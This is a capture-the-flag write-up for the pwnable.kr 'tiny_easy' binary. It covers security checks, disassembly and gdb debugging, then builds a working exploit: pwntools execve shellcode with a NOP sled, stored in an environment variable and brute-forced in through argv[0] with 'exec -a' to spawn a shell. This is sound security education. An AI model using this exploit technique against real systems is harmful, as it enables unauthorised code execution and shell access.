pwnable.kr tiny_easy writeup

0x01 Check security

$ checksec tiny_easy
[*] '/home/ubuntu/pwn/tiny_easy/tiny_easy'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

NX disasbled.

0x02 Disassemble

08048054 pop     eax
08048055 pop     edx
08048056 mov     edx, [edx]
08048058 call    edx

…?
What a tiny ELF..

0x03 Debug

(gdb) b *0x08048056
Breakpoint 1 at 0x8048056
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/pwn/tiny_easy/tiny_easy

Breakpoint 2, 0x08048056 in ?? ()
(gdb) info r
eax            0x1                 1
ecx            0x0                 0
edx            0xffff8943          -30397
ebx            0x0                 0
esp            0xffff8818          0xffff8818
ebp            0x0                 0x0
esi            0x0                 0
edi            0x0                 0
eip            0x8048056           0x8048056
eflags         0x202               [ IF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x0                 0
(gdb) x/7s $edx
0xffff8943:     "/home/ubuntu/pwn/tiny_easy/tiny_easy"
0xffff8968:     "SHELL=/bin/bash"
0xffff8978:     "WSL_DISTRO_NAME=Ubuntu-20.04"
0xffff8995:     "NAME=DESKTOP-TR6SWQE"
0xffff89aa:     "PWD=/home/ubuntu/pwn/tiny_easy"
0xffff89c9:     "LOGNAME=ubuntu"
0xffff89d8:     "_=/usr/bin/gdb"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6d6f682f in ?? ()

Obviously, the “tiny_easy” move ‘/hom’ to $edx, and then call edx let the program jump to address 0x6d6f682f(/hom), then tiggered a segmentation fault.

$ exec --help
exec: exec [-cl] [-a name] [command [arguments ...]] [redirection ...]
    Replace the shell with the given command.

    Execute COMMAND, replacing this shell with the specified program.
    ARGUMENTS become the arguments to COMMAND.  If COMMAND is not specified,
    any redirections take effect in the current shell.

    Options:
      -a name   pass NAME as the zeroth argument to COMMAND
      -c        execute COMMAND with an empty environment
      -l        place a dash in the zeroth argument to COMMAND

    If the command cannot be executed, a non-interactive shell exits, unless
    the shell option `execfail' is set.

    Exit Status:
    Returns success unless COMMAND is not found or a redirection error occurs.

The command exec with -a argument can help us pass the specified argv[0] to COMMAND, which mean that we can put shellcode into the environment variable, and then pass a guessed shellcode address to argv[0], then get the shell by brute force.

But the problem is, how to make a shellcode?

I guess we need pwntools…

$ python3
Python 3.8.10 (default, Jun  2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> asm(shellcraft.i386.linux.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'

And the shellcode address:

tiny_easy@pwnable:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
tiny_easy@pwnable:~$ gdb ./tiny_easy
(gdb) b *0x8048058
Breakpoint 1 at 0x8048058
(gdb) r
Starting program: /home/tiny_easy/tiny_easy
Breakpoint 1, 0x08048058 in ?? ()
(gdb) info r
eax            0x1      1
ecx            0x0      0
edx            0x6d6f682f       1836017711
ebx            0x0      0
esp            0xffaaac18       0xffaaac18
ebp            0x0      0x0
esi            0x0      0
edi            0x0      0
eip            0x8048058        0x8048058
eflags         0x202    [ IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
k0             0x0      0
k1             0x0      0
k2             0x0      0
k3             0x0      0
k4             0x0      0
k5             0x0      0
k6             0x0      0
k7             0x0      0
(gdb) x/8xw 0xffaaac18
0xffaaac18:     0x00000000      0xffaabd9e      0xffaabdcd      0xffaabde3
0xffaaac28:     0xffaabdf3      0xffaabe07      0xffaabe2b      0xffaabe3f
(gdb) x/16s 0xffaabd9e
0xffaabd9e:     "A=jhh///sh/bin\211\343h\001\001\001\001\201\064$ri\001\001\061\311Qj\004Y\001\341Q\211\341\061\322j\vX ̀"
0xffaabdcd:     "XDG_SESSION_ID=118569"
0xffaabde3:     "SHELL=/bin/bash"
0xffaabdf3:     "TERM=xterm-256color"
0xffaabe07:     "SSH_CLIENT=112.86.218.22 48280 2222"
0xffaabe2b:     "SSH_TTY=/dev/pts/41"
0xffaabe3f:     "USER=tiny_easy"
0xffaabe4e:     "COLUMNS=120"
0xffaabe5a:     "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
0xffaabec2:     "MAIL=/var/mail/tiny_easy"
0xffaabedb:     "_=/usr/bin/gdb"
0xffaabeea:     "PWD=/home/tiny_easy"
0xffaabefe:     "LANG=en_US.UTF-8"
0xffaabf0f:     "LINES=30"
0xffaabf18:     "HOME=/home/tiny_easy"
0xffaabf2d:     "SHLVL=1"

Ok, use 0xffaabda0 as argv[0].

0x04 EXP

Befor do brute force, we should fill the shellcode by nop(\x90), to improve the success rate of call edx.

export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done